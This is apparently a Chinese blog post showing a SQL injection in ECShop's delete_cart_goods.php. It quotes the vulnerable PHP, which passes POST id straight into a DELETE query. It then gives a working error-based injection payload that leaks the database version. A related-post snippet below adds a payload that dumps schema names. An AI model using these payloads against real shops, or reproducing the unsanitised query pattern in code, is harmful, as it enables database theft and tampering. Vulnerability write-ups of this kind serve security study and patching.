cp.wyk.la cart.php,ecshop 注入一枚

于 2021-03-16 13:31:04 发布
阅读量158 收藏
点赞数
文章标签: cp.wyk.la cart.php

应该是古老的注入吧,新版的貌似都不存在有这个文件

文件

delete_cart_goods.php

源码

http://code.taobao.org/p/ecshop_modernshowmall/src/trunk/wwwroot/delete_cart_goods.phpif($_POST['id'])

{

$sql = 'DELETE FROM '.$GLOBALS['ecs']->table('cart')." WHERE rec_id=".$_POST['id'];

$GLOBALS['db']->query($sql);

}

问题还是一样的。这里的$_POST['id']直接带入了query($sql)

bc4b5272e39d230ae9bedec9a2046e59.pngDELETE FROM `etshop`.`ecs_cart` WHERE rec_id=xxx

Unknown column 'xxx' in 'where clause'

提示找不到xxx这个字段。那我们随便写一个存在的不就好了~

首先来测试数字型的

66f9a73968e8711daca65bc6921c7ea2.png

我们再测试下字符型的

9c4dbbed0883f2f65de830fe854f07d1.png

随便赋予id值,都会带入sql语句

比如:a and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

完整的sql语句就变成了DELETE FROM `etshop`.`ecs_cart` WHERE rec_id=a and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

2915d8b8fa204d32e7aed3b75fd84059.png

苏黎世贝勒爷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ecshop测试_ECShop最新4.1.0前台免登录SQL注入0day漏洞披露与分析
weixin_36124631的博客
01-19 1187
0x00 漏洞概述影响版本:ecshop4.1.0及以下是否需要身份认证:否,前台漏洞漏洞类型:SQL注入CNVD编号:CNVD-2020-58823,https://www.cnvd.org.cn/flaw/show/2454613漏洞来源:xcheck代码安全检查源码获取:https://www.ecshop.com/,登录注册下载,最新版本为4.1.1(已修复)。0x01 漏洞详情...
nevipz_php-sip_wyk43r.rar
07-01
脚本语言服务端php实现,这是一个用php脚本语言写的其它类别,skyMVC框架 v1.2,skymvc是一款轻量、简单的php mvc框架,借鉴了各大框架的设计,采纳了很多优秀的函数及类,skymvc不鼓励傻瓜式的开发,更注重给予开发者...
TGroupon分销系统 delete_cart_goods.php 漏洞修复
weixin_33709364的博客
06-16 497
TGroupon其实就是ECSHOP修改的。漏洞文件:delete_cart_goods.phpif($_POST['id']) { $sql='DELETEFROM'.$GLOBALS['ecs']->table('cart')."WHERErec_id=".$_POST['id']; $GLOBALS['db']->query($sql); }漏洞...
ecshop 实现全站调用购物车功能
11-03 6015
今天给一朋友解决一个问题,需要在商城每个页面中的购物车处都显示购物车详情!其实,这个功能很简单,现在很多商城都在用(PS:虽然我的成都零食网现在还没有使用这个功能,并且以后暂时也没有打算使用这个功能,今天还是把这个写出来分享给大家。)。要实现并不是难事,就是在订单模板中加几个关于订单详情的显示嘛。如果需要在这里面加入删除或更新也只需要结合JS进行调用就行了。现在将我实现这个功能的方法公布如下:
EcShop开发手册
dkopg24406的专栏
09-05 1294
Ecshop文件结构 ecshop文件架构说明 ECShop 结构图及各文件相应功能介绍 ECShop upload 的目录 ┣ activity.php 活动列表 ┣ affiche.php 广告处理文件 ┣ affiliate.php 生成商品列表 ┣ article.php 文章内容 ┣ article_cat.php文章分类 ┣ au...
ecshop hash登录 + wordpress mysql盲注字段
weixin_30839881的博客
01-23 93
delete_cart_goods.phppostid=a * sq_xfkjbd 暴库and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schem...
SQL注入攻击.pdf
09-19
van Wyk. 五、专业指导 在实际工作中,应结合具体的技术栈和业务场景,灵活运用上述防御措施。例如,使用PHP时,可以采用PDO或MySQLi的预处理语句;在Java中,可以使用JDBC的PreparedStatement。同时,持续关注...
WYK直流稳压稳流电源原理及维修手册.pdf
11-26
WYK直流稳压稳流电源原理及维修手册》提供了深入理解直流稳压电源工作原理及维护方法的宝贵资料。本手册由东莞市东方集团易事特有限公司的技术部编制,涵盖了直流稳压电源的基本概念、分类、常用集成块介绍以及...
HDTRX_F1.0.16_N1.10.105.zip
02-01
标题 "HDTRX_F1.0.16_N1.10.105.zip" 暗示了这是一个软件更新或固件升级的压缩包,版本号为F1.0.16,N1.10.105。在IT领域,这种格式通常用于标识软件的不同迭代版本,F可能代表主要功能(Feature),1.0.16可能是...
cv_vanwyk.pdf
06-18
汉斯-韦纳·范怀克(Hans-Werner van Wyk)是一位专注于不确定性量化、多尺度建模、高斯随机场、敏感性分析、参数识别、数值分析以及科学计算的专家。他的简历展示了他在数学领域的深厚背景和教育成就。 范怀克在...
ecshop 下拉购物车加删除功能
xiaoxiao1689的专栏
07-04 2484
{foreach from=$goods item=goods name=goods}   {$goods.short_name} {$goods.goods_price}×{$goods.goods_number} [删除] {/foreach} 共 {$goods_number} 件商品,金额总计:{$order_amount}
经济开发区智慧园区建设方案汇报.pptx
08-13
经济开发区智慧园区建设方案汇报.pptx
STM32资料,用来备份专用
08-13
这个不需要下载,个人使用的。。
Git 基础教程.pdf
最新发布
08-13
Git 基础教程.pdf
信息化发展规划之IT治理优化.pptx
08-13
信息化发展规划之IT治理优化.pptx
财务收入支出记账表.xlsx
08-13
工资表,财务报表,对账表,付款申请,财务报告,费用支出表,财务收支 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
轴承装配机3D数模图纸 CREO设计_机械3D图可修改打包下载.zip
08-13
轴承装配机3D数模图纸 CREO设计_机械3D图可修改打包下载.zip
智慧酒店智能化系统规划设计方案.pptx
08-13
智慧酒店智能化系统规划设计方案.pptx
git教程【源码管理系统教程及版本管理功能教程】
08-13
git是一种源码管理系统(source code management,缩写为SCM)。它对当前文件提供版本管理功能,核心思想是对当前文件建立一个对象数据库(object database),将历史版本信息存放在这个数据库中。 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
arcgis js for JavaScript 4.X 移动轨迹动画 案例全部代码
05-24
以下是一个基于 ArcGIS JavaScript API 4.x 实现移动轨迹动画的示例代码: ```javascript require([ "esri/Map", "esri/views/MapView", "esri/Graphic", "esri/geometry/Point", "esri/layers/GraphicsLayer...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值